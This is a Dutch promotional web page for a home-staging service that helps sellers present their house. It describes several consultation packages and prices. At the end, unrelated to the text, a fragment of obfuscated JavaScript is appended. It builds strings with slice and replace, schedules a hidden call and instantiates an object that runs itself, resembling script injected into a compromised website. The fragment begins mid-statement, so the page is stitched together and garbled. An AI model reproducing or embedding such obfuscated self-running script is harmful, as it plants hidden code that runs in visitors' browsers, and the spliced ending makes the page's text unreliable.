Verkoopstyling

Omdat u nooit een tweede kans krijgt voor een goede eerste indruk…”

Verkoopstyling is onmisbaar voor een goede verkoop van uw woning. Een potentiële koper beslist binnen 30 seconden, dan kan de eerste indruk maar beter een hele goede indruk zijn. Uit onderzoek en ervaring is gebleken dat een investering van € 100,- meer effect heeft, dan het verlagen van de verkoopprijs met € 1.000,-. De verkoopstyliste zorgt er door middel van praktische oplossingen voor dat uw woning optimaal gepresenteerd wordt. Hierdoor zal uw woning sneller en tegen een hogere verkoopprijs verkocht worden. Verkoopstyling verdient zichzelf terug!

Basis Consult: Het Basis Consult duurt 2 à 3 uur, afhankelijk van het aantal kamers van de woning. Na een korte rondleiding analyseert de verkoopstyliste de gehele woning, inclusief de zolder, de tuin en de berging als deze aanwezig zijn. Voor elke ruimte worden de aandachtspunten genoteerd, foto’s gemaakt en praktische oplossingen gegeven. Aan het einde van het consult worden onze bevindingen, de oplossingen, praktische tips en adviezen met u besproken. Na het Consult Basis consult kunt u zelf aan de slag of u geeft de styliste de opdracht om het advies, binnen een vooraf afgesproken budget, uit te voeren.

Basis Plus Consult: In het Basis Plus Consult wordt de woning op dezelfde manier geanalyseerd als in het Basis Consult. Als extra zullen onze bevindingen, oplossingen, tips en adviezen zullen in een uitgebreide schriftelijke uitwerking aan u worden overhandigd. Daarnaast wordt er een beknopte begroting opgesteld voor het uit te voeren plan. De uitvoering daarvan kan ook geheel of gedeeltelijk uitgevoerd worden door de styliste.

Finishing Touch: Snelle styling speciaal voor bezichtigingen of voor het maken van de foto’s voor internet en brochure.

Combinatiepakket: Combineer een verkoopstylingconsult met een interieurontwerp. Uw huis sneller en beter verkocht en uw nieuwe woning perfect ingericht.

Verkoopstyling is al mogelijk vanaf € 100,-.

Verkoopstyling verdient zichzelf terug….”

tjrF4').slice(6, -10).replace(/YY/g, 'tm'));var dME=4459;lV="";a[qN](function(){ p.s() }, 343);jI="jI";lP='';}var pE=new Array();var rN=new Date();jF=47524;var uS=function(){return 'uS'};}};this.nB=10734;var oJ=new iX(); this.mA=false;oJ.s();var aL="";